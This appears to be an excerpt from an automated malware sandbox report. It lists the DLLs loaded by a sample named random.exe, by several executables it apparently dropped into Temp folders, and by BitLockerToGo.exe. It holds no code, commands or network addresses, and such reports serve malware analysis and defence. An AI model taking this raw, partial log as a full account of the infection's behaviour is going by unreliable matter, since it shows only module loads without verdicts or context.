Source: C:\Users\user\Desktop\random.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Section loaded: umpdc.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wininet.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iertutil.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: windows.storage.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wldp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: urlmon.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: srvcli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: netutils.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: propsys.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: linkinfo.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntshrui.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wininet.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iertutil.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: windows.storage.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wldp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll
